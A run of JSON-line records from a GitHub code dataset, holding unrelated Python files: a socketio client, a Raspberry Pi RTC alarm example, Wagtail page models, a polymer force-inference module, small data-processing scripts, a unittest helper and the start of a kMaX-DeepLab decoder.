req_config=[[\"imaging\", [\"pixel size\"]]],\n req_features=[\"area_cvx\"])\n\n AncillaryFeature(feature_name=\"aspect\",\n method=compute_aspect,\n req_features=[\"size_x\", \"size_y\"])\n\n AncillaryFeature(feature_name=\"deform\",\n method=compute_deform,\n req_features=[\"circ\"])\n","repo_name":"DC-analysis/dclab","sub_path":"dclab/rtdc_dataset/feat_anc_core/af_basic.py","file_name":"af_basic.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"83"} +{"seq_id":"3526253178","text":"#async socketio client\nimport socketio\nimport asyncio\n\n# sio = socketio.Client()\nsio = socketio.AsyncClient()\n\n@sio.event\nasync def connect():\n print(\"I'm (client) connected!\")\n # await sio.emit('join',{'foo': 'bar'})\n # await sio.emit('pub_kday',data={'test':123})\n\n\n\n@sio.on('kday')\nasync def kday(data):\n print('kday:{}'.format(data))\n\n@sio.event\nasync def my_message(data):\n print('I received a message!, data:{}'.format(data))\n \n await sio.emit('join',{'in my message': 'bar'})\n\n@sio.event\ndef disconnect():\n print(\"I'm (client) disconnected!\")\n\n","repo_name":"existedinnettw/prireap","sub_path":"prireap/crawSrc/asioc.py","file_name":"asioc.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72336148751","text":"from __future__ import print_function\nimport sys\nsys.path.append('../')\nimport time\nimport threading\nimport RPi.GPIO as GPIO\nfrom DFRobot_DS323X import *\n\nrtc = DFRobot_DS323X(bus=1)\n\nGPIO.setmode(GPIO.BCM)\n\n\n#begin return True if succeed, otherwise return False\nwhile not rtc.begin():\n time.sleep(2)\n\n'''\n@brief Set the vaule of pin sqw\n@param mode SquareWave_OFF = 0x01 # Not output square wave, enter interrupt mode\n@n SquareWave_1Hz = 0x00 # 1Hz square wave\n@n SquareWave_1kHz = 0x08 # 1kHz square wave\n@n SquareWave_4kHz = 0x10 # 4kHz square wave\n@n SquareWave_8kHz = 0x18 # 8kHz square wave\n'''\nrtc.write_sqw_pin_mode(rtc.SquareWave_OFF)\n\n'''\n@brief enable the interrupt of alarm\n'''\nrtc.enable_alarm1_int();#@enable Alarm1 interrupt\n#rtc.disable_alarm1_int();#@disable Alarm1 interrupt\nrtc.enable_alarm2_int();#@enable Alarm2 interrupt\n#rtc.disable_alarm2_int();#@disable Alarm2 interrupt\n\n'''\n@brief Set the last compiled time as the current time\n'''\n#rtc.set_hour_system(rtc.H12hours)\nrtc.set_time(2021,2,28,23,59,55)\n\n'''\n@brief Set alarm1 clock\n@param alarmType:EverySecond, #repeat in every second\n@n SecondsMatch, #repeat in every minute\n@n SecondsMinutesMatch, #repeat in every hour\n@n SecondsMinutesHoursMatch, #repeat in every day\n@n SecondsMinutesHoursDateMatch, #repeat in every month\n@n SecondsMinutesHoursDayMatch, #repeat in every week #Alarm1\n@n UnknownAlarm1\n@param days Alarm clock Day (0-31)\n@param hours Alarm clock Hour (0-23)\n@param minutes Alarm clock Minute (0-59)\n@param seconds Alarm clock Second (0-59)\n'''\nrtc.set_alarm1(alarmType=rtc.SecondsMatch,date=1,hour=0,minute=0,second=5)\n'''\n@brief Set alarm2 clock\n@param alarmType:EveryMinute, #repeat in every minute\n@n MinutesMatch, #repeat in every hour\n@n MinutesHoursMatch, #repeat in every day\n@n MinutesHoursDateMatch, #repeat in every month\n@n MinutesHoursDayMatch, #repeat in every week #Alarm2\n@n UnknownAlarm2\n@param days Alarm clock Day (0-31)\n@param hours Alarm clock Hour (0-23)\n@param minutes Alarm clock Minute(0-59)\n'''\nrtc.set_alarm2(alarmType=rtc.MinutesHoursDayMatch,date=1,hour=0,minute=0)\n\nIO1 = 21#set interrupt pin\n\ndef IO1_callback(channel):#callback function\n global rtc\n rtc.clear_alarm()\n print(\"Alarm clock is triggered.\")\n \nGPIO.setup(IO1, GPIO.IN)\n'''\n@brief When IO1 changes to high level from low level and a FALLING level transition occurs, way to run IO1_callback \n'''\nGPIO.add_event_detect(IO1, GPIO.FALLING, callback = IO1_callback)\n\ndef main():\n while True:\n if rtc.is_lost_power() == 1:\n print(\"RTC lost power, please reset the time!\")\n print(\"{0}/{1}/{2},{3},{4}:{5}:{6} {7}\".format(rtc.get_year(),rtc.get_month(),rtc.get_date(),\\\n rtc.get_day_of_week(),rtc.get_hour(),rtc.get_minute(),rtc.get_second(),rtc.get_AM_or_PM()))#print now time\n \n print(\" \")\n time.sleep(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DFRobot/DFRobot_DS323X","sub_path":"python/raspberrypi/examples/set_alarm_interrupt.py","file_name":"set_alarm_interrupt.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29891629203","text":"from django.db import models\n\nfrom wagtail.wagtailcore import blocks\nfrom wagtail.wagtailcore.models import Page, Orderable\nfrom wagtail.wagtailcore.fields import RichTextField, StreamField\nfrom wagtail.wagtaildocs.edit_handlers import DocumentChooserPanel\nfrom wagtail.wagtailimages.edit_handlers import ImageChooserPanel\nfrom wagtail.wagtailimages.models import Image\nfrom wagtail.wagtailsnippets.models import register_snippet\nfrom modelcluster.fields import ParentalKey\nfrom wagtail.wagtailadmin.edit_handlers import (\n FieldPanel, MultiFieldPanel, InlinePanel, PageChooserPanel, StreamFieldPanel\n)\nfrom wagtail.wagtailsearch import index\nfrom wagtail.wagtailforms.models import AbstractEmailForm, AbstractFormField\nfrom utils.models import LinkFields, ContactFields, RelatedLink, CarouselItem\nfrom wagtail.contrib.settings.models import BaseSetting, register_setting\nfrom wagtail.wagtailimages.blocks import ImageChooserBlock\n\n\nclass HomePageContentItem(Orderable, LinkFields):\n page = ParentalKey('pages.HomePage', related_name='content_items')\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n title = models.CharField(max_length=100)\n content = RichTextField(null=True,blank=True,)\n summary = RichTextField(blank=True)\n slug = models.SlugField()\n\n panels = [\n FieldPanel('title'),\n ImageChooserPanel('image'),\n FieldPanel('summary'),\n FieldPanel('content'),\n FieldPanel('slug'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n\nclass HomePageCarouselItem(Orderable, CarouselItem):\n page = ParentalKey('pages.HomePage', related_name='carousel_items')\n\n\nclass HomePageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('pages.HomePage', related_name='related_links')\n\n\n## MY STREAMFIELD BLOCKS ##\n\nclass HtmlBlock(blocks.StructBlock):\n html_content = blocks.TextBlock(required=False)\n\n class Meta:\n template = 'blocks/html_block.html'\n icon = 'code'\n\nclass WysiwygBlock(blocks.StructBlock):\n wysiwyg_content = blocks.RichTextBlock(required=False)\n horizontal_alignment = blocks.ChoiceBlock(choices=[\n ('left', 'Left'),\n ('right', 'Right'),\n ('center', 'Center'),\n ])\n\n class Meta:\n template = 'blocks/wysiwyg_block.html'\n icon = 'pilcrow'\n\nclass ColumnBlock(blocks.StructBlock):\n background_image = ImageChooserBlock(required=False)\n background_color = blocks.TextBlock(required=False)\n padding = blocks.TextBlock(required=False)\n max_width = blocks.TextBlock(required=False)\n content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ])\n\n class Meta:\n template = 'blocks/column_block.html'\n icon = 'grip'\n\nclass RowBlock(blocks.StructBlock):\n background_image = ImageChooserBlock(required=False)\n background_color = blocks.TextBlock(required=False)\n padding = blocks.TextBlock(required=False)\n max_width = blocks.TextBlock(required=False)\n vertical_alignment = blocks.ChoiceBlock(choices=[\n ('top', 'Top'),\n ('bottom', 'Bottom'),\n ('middle', 'Middle'),\n ('baseline', 'Baseline'),\n ])\n\n content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Column', ColumnBlock()),\n ])\n\n class Meta:\n template = 'blocks/row_block.html'\n icon = 'horizontalrule'\n\nclass HeroBlock(blocks.StructBlock):\n hero_image = ImageChooserBlock(required=False)\n background_color = blocks.TextBlock(required=False)\n padding = blocks.TextBlock(required=False)\n logo = blocks.ChoiceBlock(choices=[\n ('hide', 'Hide'),\n ('show', 'Show'),\n ('animate', 'Animate'),\n ])\n hero_content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ])\n\n class Meta:\n template = 'blocks/hero_block.html'\n icon = 'pick'\n\nclass HeroDonateBlock(blocks.StructBlock):\n hero_image = ImageChooserBlock(required=False)\n background_color = blocks.TextBlock(required=False)\n padding = blocks.TextBlock(required=False)\n amount_one = blocks.TextBlock(required=False)\n amount_two = blocks.TextBlock(required=False)\n amount_three = blocks.TextBlock(required=False)\n amount_four = blocks.TextBlock(required=False)\n amount_five = blocks.TextBlock(required=False)\n amount_six = blocks.TextBlock(required=False)\n logo = blocks.ChoiceBlock(choices=[\n ('hide', 'Hide'),\n ('show', 'Show'),\n ('animate', 'Animate'),\n ])\n hero_content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ])\n thankyou_content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ])\n\n class Meta:\n template = 'blocks/hero_donate_block.html'\n icon = 'pick'\n\nclass HeroCallToActionBlock(blocks.StructBlock):\n background_color = blocks.TextBlock(required=False)\n pull_up = blocks.TextBlock(required=False)\n cta_content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ])\n\n class Meta:\n template = 'blocks/hero_cta_block.html'\n icon = 'pick'\n\n## END OF MY STREAMFIELD BLOCKS ##\n\nclass DonatePage(Page):\n title_text = RichTextField(null=True, blank=True)\n feed_image = models.ForeignKey(\n Image,\n help_text=\"An optional image to represent the page\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n body = StreamField([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ('Hero', HeroDonateBlock()),\n ('Hero_CTA', HeroCallToActionBlock()),\n ],null=True,blank=True)\n\n class Meta:\n verbose_name = \"Donation Page\"\n\nDonatePage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('title_text', classname=\"full\"),\n StreamFieldPanel('body'),\n]\n\n\n\nclass HomePage(Page):\n title_text = RichTextField(null=True, blank=True)\n feed_image = models.ForeignKey(\n Image,\n help_text=\"An optional image to represent the page\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n body = StreamField([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ('Hero', HeroBlock()),\n ('Hero_CTA', HeroCallToActionBlock()),\n ],null=True,blank=True)\n\n search_fields = Page.search_fields + (\n index.SearchField('body'),\n )\n\n class Meta:\n verbose_name = \"Homepage\"\n\nHomePage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('title_text', classname=\"full\"),\n StreamFieldPanel('body'),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n InlinePanel('content_items', label=\"Content Blocks\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\nHomePage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\nclass StandardIndexPageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('pages.StandardIndexPage', related_name='related_links')\n\n\nclass StandardIndexPage(Page):\n subtitle = models.CharField(max_length=255, blank=True)\n intro = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n Image,\n help_text=\"An optional image to represent the page\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n indexed_fields = ('intro', )\n\nStandardIndexPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('subtitle', classname=\"full title\"),\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\nStandardIndexPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\n# Standard page\n\nclass StandardPageCarouselItem(Orderable, CarouselItem):\n page = ParentalKey('pages.StandardPage', related_name='carousel_items')\n\n\nclass StandardPageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('pages.StandardPage', related_name='related_links')\n\n\nclass StandardPage(Page):\n TEMPLATE_CHOICES = [\n ('pages/standard_page.html', 'Default Template'),\n ('pages/standard_page_full.html', 'Standard Page Full'),\n ]\n subtitle = models.CharField(max_length=255, blank=True)\n intro = RichTextField(blank=True)\n body = StreamField([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ('Hero', HeroBlock()),\n ('Hero_CTA', HeroCallToActionBlock()),\n ],null=True,blank=True)\n template_string = models.CharField(\n max_length=255, choices=TEMPLATE_CHOICES,\n default='pages/standard_page.html'\n )\n feed_image = models.ForeignKey(\n Image,\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n search_fields = Page.search_fields + (\n index.SearchField('intro'),\n index.SearchField('body'),\n )\n\n @property\n def template(self):\n return self.template_string\n\n\nStandardPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('subtitle', classname=\"full title\"),\n FieldPanel('intro', classname=\"full\"),\n StreamFieldPanel('body'),\n FieldPanel('template_string'),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n InlinePanel('related_links', label=\"Related links\"),\n\n]\n\nStandardPage.promote_panels = Page.promote_panels + [\n ImageChooserPanel('feed_image'),\n]\n\nclass ContentBlock(LinkFields):\n page = models.ForeignKey(\n Page,\n related_name='contentblocks',\n null=True,\n blank=True\n )\n title = models.CharField(max_length=255)\n body = RichTextField()\n summary = RichTextField(blank=True)\n slug = models.SlugField()\n panels = [\n PageChooserPanel('page'),\n FieldPanel('title'),\n FieldPanel('summary'),\n FieldPanel('body', classname=\"full\"),\n FieldPanel('slug'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n def __unicode__(self):\n return u\"{0}[{1}]\".format(self.title, self.slug)\n\nregister_snippet(ContentBlock)\n\n\nclass Testimonial(LinkFields):\n page = models.ForeignKey(\n Page,\n related_name='testimonials',\n null=True,\n blank=True\n )\n name = models.CharField(max_length=150)\n photo = models.ForeignKey(\n Image, null=True, blank=True, on_delete=models.SET_NULL\n )\n text = models.CharField(max_length=255)\n\n panels = [\n PageChooserPanel('page'),\n FieldPanel('name'),\n ImageChooserPanel('photo'),\n FieldPanel('text'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n def __unicode__(self):\n return self.name\n\nregister_snippet(Testimonial)\n\n\nclass Advert(LinkFields):\n page = models.ForeignKey(\n Page,\n related_name='adverts',\n null=True,\n blank=True\n )\n title = models.CharField(max_length=150, null=True)\n image = models.ForeignKey(Image, null=True, blank=True, on_delete=models.SET_NULL)\n text = RichTextField(blank=True)\n\n panels = [\n PageChooserPanel('page'),\n FieldPanel('title'),\n ImageChooserPanel('image'),\n FieldPanel('text'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n def __unicode__(self):\n return self.title\n\nregister_snippet(Advert)\n\n\n# Faqs Page\n\nclass FaqsPage(Page):\n body = StreamField([\n ('faq_question', blocks.CharBlock(classname=\"full title\")),\n ('faq_answer', blocks.RichTextBlock()),\n ])\n\nFaqsPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n StreamFieldPanel('body'),\n]\n","repo_name":"DonaldTrumpHasTinyHands/tiny_hands_pac","sub_path":"pages/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2739517029","text":"\"\"\"\n(c) Simon Grosse-Holz, 2020\n\nSome code used for force inference in a Rouse model. Given the trajectory of\nsome polymer locus, infer the force that the polymer exerts on it, assuming\nthat we start from equilibrium and there are no other forces acting (i.e. we\nare dealing with one force pulling at one point of the polymer).\n\nUnits\n-----\nOnce calibrated (using MSD data), the code works with physical units.\nWe use s, μm, pN.\n\"\"\"\n\nimport os, sys\n\nimport numpy as np\nimport scipy.linalg as la\nimport scipy.special\n\nclass locusInference:\n def __init__(self, t, x=None, Gamma=None, tR=None, alpha=0.5, shift=1):\n \"\"\"\n Initialize for trajectories sampled at times t. The switches in force\n are shifted backward by a fraction s, i.e. the force switches from\n f[i-1] to f[i] at t[i] - s*(t[i] - t[i-1]). Note that this means M is\n singular for s=0.\n\n NOTE: shifts other than 1 screw with the friction inference. This\n parameter exists mostly for historic reasons.\n\n alpha is the exponent used in the memory kernel when inferring f from x\n (or the other way round). So far, it is purely heuristically inserted,\n but maybe it's useful. TODO: do the theory for this.\n\n Input\n -----\n t : (N,) array\n sampling times in seconds\n x : (N, ...) array\n locus trajectory in μm.\n Note that x[0] should be the equilibrium position of the locus\n (i.e. the math assumes that the locus is in equilibrium at the\n start of the trajectory. Everything else wouldn't make sense,\n because we would have to specify the whole polymer conformation.)\n x can have multiple dimensions. The first one is assumed to be\n time.\n Gamma : float\n MSD prefactor, used for calibration. Should be in μm^2/s**alpha\n tR : Rouse time of a finite tether on one side. If None (default), both\n tethers will be infinite. Mathematically this of course simply\n means tR = inf.\n NOTE: So far, a finite tether assumes alpha = 0.5.\n alpha : float in (0, 1)\n Scaling exponent of the MSD, i.e. this controls viscoelasticity of\n the medium. Note that this is incorporated by me tweaking the\n formulas, so no guarantees on correctness for any alpha != 0.5.\n That being said, doesn't look to bad.\n s : float\n relative shift of the force switches\n \"\"\"\n # if shift != 1:\n # print(\"Warning: s != 1 screws with the friction inference!\")\n if tR is not None and alpha != 0.5:\n print(\"Warning: finite tether not supported for alpha != 0.5!\")\n\n self.t = t\n self.x = x\n self.tR = tR\n self.alpha = alpha\n self.s = shift\n\n if Gamma is not None:\n self._calibrate(Gamma)\n else:\n self._kT = 1\n self._spgk = 1\n self.Gamma = self._kT/self._spgk\n\n self.updateM(tR=tR)\n\n def _calibrate(self, Gamma, kT=4.114e-3):\n \"\"\"\n Get prefactors in SI, assuming that\n Γ is in μm^2/s^alpha\n kT is in pN*μm\n \"\"\"\n self._kT = kT\n self._spgk = 2*kT / Gamma # sqrt(pi * gamma * kappa) in the Rouse model\n self.Gamma = Gamma\n self.updateM()\n \n def updateM(self, tR=None):\n if tR is None:\n def resqrt(x):\n return ((1+np.sign(x))/2*x)**self.alpha\n else:\n def resqrt(x):\n ind = x > 1e-10\n ret = np.zeros_like(x)\n ret[ind] = np.sqrt(x[ind])*(1-np.exp(-np.pi**2*tR/x[ind])) + np.pi**(3/2)*np.sqrt(tR)*scipy.special.erfc(np.pi*np.sqrt(tR/x[ind]))\n return ret\n\n tforce = list((1-self.s)*self.t[1:] + self.s*self.t[:-1])\n tforce = np.array([self.t[0]-self.t[1]+tforce[0]] + tforce + [self.t[-1] + tforce[-1] - self.t[-2]])\n self.M = 1/self._spgk * ( \\\n resqrt(np.expand_dims(self.t, 1) - \\\n np.expand_dims(tforce[:-1], 0) ) - \\\n resqrt(np.expand_dims(self.t, 1) - \\\n np.expand_dims(tforce[1:], 0) ) )\n self.invM = la.inv(self.M)\n\n### The mathematical basis ###\n def _generate(self, f):\n \"\"\"\n Input\n -----\n f : force trajectory, in pN\n\n Output\n ------\n x : locus trajectory, in μm\n \"\"\"\n assert len(f) == len(self.t)\n return self.M @ f\n\n def _infer(self, x):\n \"\"\"\n Basic inference, i.e. for a generic point on the polymer \n\n Input\n -----\n x : locus trajectory, in μm\n\n Output\n ------\n f : force trajectory, in pN\n \"\"\"\n assert len(x) == len(self.t)\n return self.invM @ (x - np.expand_dims(x[0], 0))\n### ###\n\n def populate(self, x=None, giveOutput=False):\n \"\"\"\n Main workhorse. Takes self.x and does the full inference, saving\n intermediate results in class attributes.\n\n This is basically a wrapper for self._infer, just that it also\n calculates some other stuff that could be useful, like velocities.\n\n Output\n ------\n inferred force, in pN\n \"\"\"\n if x is not None:\n self.x = x\n\n # Calculate velocity AT the t[i], where we assume that the locus does\n # not move before and after the experiment\n self.vAt = ( (1-self.s)*(self.x[2:]-self.x[1:-1]) + self.s*(self.x[1:-1]-self.x[:-2]) ) / \\\n ( (1-self.s)*(self.t[2:]-self.t[1:-1]) + self.s*(self.t[1:-1]-self.t[:-2]) )[:, None]\n self.vAt = np.array([(1-self.s)*(self.x[1]-self.x[0])/(self.t[1]-self.t[0])] + \\\n list(self.vAt) + \\\n [self.s*(self.x[-1]-self.x[-2])/(self.t[-1]-self.t[-2])])\n \n # The basic inference\n self.fpoly = -self._infer(self.x)\n\n # # Remove viscuous ball force\n # self.g = np.sum(np.diff(self.fraw)*np.diff(self.vAt)) / np.sum(np.diff(self.vAt)**2)\n # self.finf = self.fraw - self.g*self.vAt\n\n if giveOutput:\n return self.fpoly\n\n def difMagnetic(self, fmagnetic):\n \"\"\"\n Calculate the difference to the measured magnetic force\n \"\"\"\n self.fmagnetic = fmagnetic\n self.funex = -self.fmagnetic - self.fpoly\n\n### Noise ###\n def covTrajectory(self):\n \"\"\"\n Covariance matrix for the trajectory, for fixed x[0]. This is given by\n\n S(t, t') = 1/2*(MSD(t) + MSD(t') - MSD(|Δt|)) .\n \n Use .util.sampleCov0() to sample from this.\n \"\"\"\n t0 = np.expand_dims(self.t, 0) - self.t[0]\n t1 = np.expand_dims(self.t, 1) - self.t[0]\n\n return 0.5*self.Gamma*( t0**self.alpha + t1**self.alpha - np.abs(t0-t1)**self.alpha )\n\n def covForce(self):\n \"\"\"\n Covariance matrix for the force, given the covariance matrix of the\n trajectory. This is simple Gaussian error propagation:\n\n S_force = M^{-1} @ S @ M^{-T} .\n\n Use .util.sampleCov0() to sample from this.\n \"\"\"\n return self.invM @ self.covTrajectory() @ self.invM.T\n\n### Dragging ###\n def computeFdrag(self, density, mode=0, ix=1, giveOutput=False, giveTrajs=False):\n \"\"\"\n Calculate the additional force exerted on the locus, if it has to drag\n local density with it.\n\n Input\n -----\n density : (N,) array\n the local density at the position of the locus. This is basically\n just a local proportionality factor. As such, it will be included\n linearly (there was an idea at some point that dependency on the\n density should be a square root... who knows).\n mode : integer\n specifies the model to use. So far implemented:\n 0 = sticky chromatin\n 1 = two-sided glove\n 2 = one-sided glove\n ix : component of x for which to calculate.\n\n Output\n ------\n fdrag : the force exerted by all the dragged stuff\n \"\"\"\n if len(self.x.shape) == 1:\n x = self.x\n v = self.vAt\n else:\n x = self.x[:, ix]\n v = self.vAt[:, ix]\n\n if giveTrajs:\n trajs = np.zeros((len(x), len(x)))\n fdrag = np.zeros_like(x)\n for j in range(len(x)):\n offset = x[j]\n traj = x - offset\n traj[:j] = 0\n\n moveForward = v[j] > 0 # If moving backwards, the glove also works backwards!\n if mode == 2:\n moveForward = True\n\n while True:\n F = self._infer(traj)\n ind = np.where(F < -1e-10 if moveForward else F > 1e-10)[0]\n\n if len(ind) == 0 or mode == 0:\n break\n ind = ind[0]\n\n F[ind:] = 0\n traj = self._generate(F)\n traj[ind:] = (np.maximum if moveForward else np.minimum)(traj[ind:], x[ind:]-offset)\n\n fdrag += density[j]*F\n if giveTrajs:\n trajs[:, j] = traj\n\n # Handle all the output possibilities\n if len(self.x.shape) == 1:\n self.fdrag = fdrag\n else:\n if not hasattr(self, 'fdrag'):\n self.fdrag = np.empty(self.x.shape)\n self.fdrag[:] = np.nan\n self.fdrag[:, ix] = fdrag\n\n if giveOutput and giveTrajs:\n return fdrag, trajs\n elif giveOutput:\n return fdrag\n elif giveTrajs:\n return trajs\n","repo_name":"SGrosse-Holz/rouselib","sub_path":"rouselib/locus.py","file_name":"locus.py","file_ext":"py","file_size_in_byte":9718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"9225784834","text":"import os\r\nimport time\r\nimport numpy as np\r\nimport pandas as pd\r\nt0 = time.time()\r\n\r\nsum_list = []\r\nfiles = os.listdir(r'C:\\Users\\user\\Desktop\\elearning_exam2020fin')\r\n\r\nfor n, i in enumerate(files):\r\n tem_list = [i.replace('.xlsx', '')]\r\n df = pd.read_excel(r'C:\\\\Users\\\\user\\\\Desktop\\\\elearning_exam2020fin\\\\' + i, sheet_name='測驗統計')\r\n df = df.iloc[1:, :]\r\n for j in range(df.shape[0]):\r\n if len(df.iloc[j, 0]) > 5:\r\n tem_list.append(df.iloc[j, 0])\r\n for k in range(2):\r\n tem_list.append('--')\r\n tem_list.append(df.iloc[j, 1])\r\n tem_list.append(df.iloc[j, 3])\r\n if df.iloc[j, 1] == '否':\r\n for k in range(4):\r\n tem_list.append('--')\r\n sum_list.append(tem_list)\r\n\r\nprint('花費時間:',time.time()-t0)\r\ndf_output = pd.DataFrame(sum_list)\r\ndf_output.to_excel(r'C:\\Users\\user\\Desktop\\elearning_exam2020-2.xlsx', sheet_name='elearning_exam', index=0, header=0)","repo_name":"Jinyuan-Li/Data_Processing","sub_path":"elearning_exam2020.py","file_name":"elearning_exam2020.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6779111544","text":"import xml.dom.minidom\nimport requests\n\ndef kurs():\n r = requests.get('http://www.cbr.ru/scripts/XML_daily.asp')\n dom = xml.dom.minidom.parseString(r.text)\n dom.normalize()\n node1 = dom.getElementsByTagName(\"Value\")[11]\n euro = float(node1.childNodes[0].nodeValue.replace(',', '.'))\n return euro\n\n\ndef rubtoeur(rub):\n if rub <= 0:\n print('Деньги из воздуха - возможно. Но не здесь.')\n else:\n result = round((rub / kurs()), 2)\n a = int(result)\n b = int((result - a) * 100)\n if (b % 10) == 1:\n print(f'По текущему курсу у Вас есть: {a} евро и {b} цент.')\n elif 2 <= (b % 10) <= 4:\n print(f'По текущему курсу у Вас есть: {a} евро и {b} цента.')\n else:\n print(f'По текущему курсу у Вас есть: {a} евро и {b} центов.')\n\n\ntry:\n rub = float(input(\"Введите сумму в рублях: \"))\n rubtoeur(rub)\nexcept ValueError:\n print(\"Вводить нужно только цифры\")\n","repo_name":"Igor-Kazak/Tel-Ran_Python","sub_path":"Day2/day2_homework4_xml.py","file_name":"day2_homework4_xml.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74411390990","text":"import unittest\n\n\nclass OF_TestXmlInputs_Base( unittest.TestCase ):\n \"\"\"\n Base TEST class extends unittest.TestCase and\n it provides possibility to add parameters for \n all subclasses by call a static constructor:\n \n OF_TestXmlInputs_Base.load_file_name(sub_class_name, param)\n \"\"\"\n\n def __init__( self, methodName = 'runTest', path_to_xml = None ):\n \"\"\"\n private default constructor\n \"\"\"\n super( OF_TestXmlInputs_Base, self ).__init__( methodName )\n self.path_to_xml = path_to_xml\n\n @staticmethod\n def load_file_name( clazz, path_to_xml = None ):\n \"\"\"\n static constructor for all subclasses with param\n param -> path_to_xml (default None)\n \"\"\"\n testloader = unittest.TestLoader()\n testnames = testloader.getTestCaseNames( clazz )\n suite = unittest.TestSuite()\n for name in testnames:\n suite.addTest( clazz( name, path_to_xml = path_to_xml ) )\n return suite\n","repo_name":"opendaylight/openflowplugin","sub_path":"test-scripts/tools/test_with_param_superclass.py","file_name":"test_with_param_superclass.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"83"} +{"seq_id":"12395064823","text":"import functools\nfrom typing import Callable, Optional, Tuple\n\nimport tensorflow as tf\n\nfrom deeplab2 import common\nfrom deeplab2.model.layers import axial_block_groups\nfrom deeplab2.model.layers import convolutions\n\n# A transformer decoder block with multi-head self-attention and single-head\n# k-means cross-attention, as proposed in kMaX-DeepLab.\ntransformer_decoder_block = functools.partial(\n axial_block_groups.BlockGroup,\n num_blocks=1,\n # Note that the variable 'filters' is required by BlockGroup, and thus we\n # set filters = 128 (a random value), which does not affect the dual-path\n # transformer (i.e., changing this value will have no effect here).\n filters=128,\n original_resnet_stride=1,\n original_resnet_input_stride=32,\n use_transformer_beyond_stride=16,\n # The channels of dual-path transformer is controlled by\n # (128 * transformer_expansion).\n transformer_expansion=1.0,\n activation='gelu',\n # Disable the pixel2pixel attention.\n use_axial_block=False,\n dual_path_transformer_layer_config={\n 'use_memory_self_attention': True,\n 'use_memory2pixel_feedback_attention': False,\n 'use_pixel2memory_feedback_attention': False,\n 'use_kmeans_cross_attention': True,\n })\n\n\nclass KMaXTransformerDecoder(tf.keras.Model):\n \"\"\"kMaX Transformer Decoder.\n\n The transformer decoder in the k-means Mask Transformer (kMaX) employs the\n k-means cross attention, where an argmax is operated along the cluster center\n dimension (instead of a softmax along the spatial dimension). The argmax\n operation is similar to the k-means pixel-cluster assignment step (with a hard\n assignment). The cluster centers are then updated by aggregating the pixel\n features based on the pixel-cluster assignment (computed by their feature\n affinity), similar to the k-means center-update step.\n\n References:\n [1] k-means Mask Transformer, ECCV 2022.\n Qihang Yu, Huiyu Wang, Siyuan Qiao, Maxwell Collins, Yukun Zhu,\n Hartwig Adam, Alan Yuille, Liang-Chieh Chen.\n \"\"\"\n\n def __init__(self,\n name: str,\n auxiliary_predictor_func: Optional[Callable[[], tf.keras.Model]],\n norm_layer: Optional[Callable[\n [],\n tf.keras.layers.Layer]] = 